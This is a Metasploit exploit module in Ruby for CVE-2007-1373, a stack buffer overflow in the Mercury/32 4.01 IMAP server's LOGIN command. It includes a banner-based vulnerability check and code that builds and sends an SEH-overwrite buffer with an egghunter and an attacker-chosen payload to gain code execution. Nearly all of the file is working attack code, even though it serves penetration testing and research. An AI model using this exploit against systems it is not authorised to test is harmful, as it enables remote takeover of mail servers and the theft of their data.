##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
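class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
          LOGIN verb. By sending a specially crafted login command, a buffer
          is corrupted, and code execution is possible. This vulnerability was
          discovered by (mu-b at digit-labs.org).
        },
        'Author' => [
          'mu-b', # Discovery and exploit
          'MC', # Metasploit module
          'Ivan Racic' # Automatic targeting + egg hunter
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2007-1373'],
          ['EDB', '3418']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          # NUL, CR, LF and space terminate or split the LOGIN arguments.
          'BadChars' => "\x00\x0a\x0d\x20",
          'Space' => 2500
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows Universal',
            {
              # SEH handler address. Note the high byte is 0x00, which is in
              # BadChars: it is placed after the egg+payload, so only the
              # trailing nops and hunter sit beyond it.
              'Ret' => 0x00401460
            }
          ]
        ],
        'DisclosureDate' => '2007-03-06',
        'DefaultTarget' => 0,
        'Notes' => {
          # TODO(review): these placeholders should be filled in. A failed SEH
          # overwrite in the IMAP service process is likely to take the service
          # down, but that was not verified here.
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        Opt::RPORT(143)
      ]
    )
  end

  # Fingerprints the IMAP greeting banner.
  #
  # Only the 4.01a / 4.01b banners are reported as Vulnerable. Any other
  # Mercury/32 banner is reported as Detected rather than Safe, because the
  # description claims "<= 4.01b" while only 4.01a/b were confirmed. A missing
  # banner or a failed connection is Unknown, not Safe, since nothing was
  # actually verified. The socket is always closed, even if get_once raises.
  def check
    banner = nil
    begin
      connect
      banner = sock.get_once
    rescue ::Rex::ConnectionError
      return CheckCode::Unknown
    ensure
      disconnect
    end

    return CheckCode::Unknown if banner.nil? || banner.empty?
    return CheckCode::Vulnerable if banner =~ %r{Mercury/32 v4\.01[ab]}
    return CheckCode::Detected if banner =~ %r{Mercury/32}

    CheckCode::Safe
  end

  # Builds and sends the malicious LOGIN command.
  #
  # Layout of the request (offsets carried over from the original exploit,
  # EDB 3418; they were not re-derived here and are specific to that build):
  #   'A001 LOGIN ' + 1008 spaces + "{n}\n"   IMAP literal introducer, n random
  #   347 bytes filler
  #   egg tag + encoded payload                 located later by the egghunter
  #   filler up to 7500 bytes total (egg+payload region)
  #   nSEH = "je +6; jne +4" (skips the handler), SEH = target.ret
  #   20 nops + egghunter stub
  #
  # The status line is printed before the send so the log order matches what
  # actually happens on the wire; the socket is closed in an ensure block.
  def exploit
    hunter, egg = generate_egghunter(payload.encoded)

    begin
      connect
      sock.get_once # greeting banner, not needed

      # Random literal byte count; the exploit relies on the server's literal
      # handling (see EDB 3418), the particular value is not significant.
      literal_len = rand(255)

      sploit = 'A001 LOGIN ' + ("\x20" * 1008) + "{#{literal_len}}\n"
      sploit << rand_text_alpha_upper(347)
      sploit << egg + payload.encoded
      # rand_text_alpha_upper yields "" for a non-positive length, so an
      # oversized payload just drops the filler rather than failing here.
      sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
      # nSEH: 74 06 = je +6, 75 04 = jne +4 -- one of the two always jumps
      # past the 4-byte handler into the nops below. The packed handler ends
      # in 0x00; the nops and hunter after it presumably survive the copy
      # (length-based rather than NUL-terminated) -- confirm against target.
      sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
      sploit << make_nops(20)
      sploit << hunter

      print_status("Sending payload (#{sploit.length} bytes) ...")
      sock.put(sploit)
      sock.get_once
      handler
    ensure
      disconnect
    end
  end
end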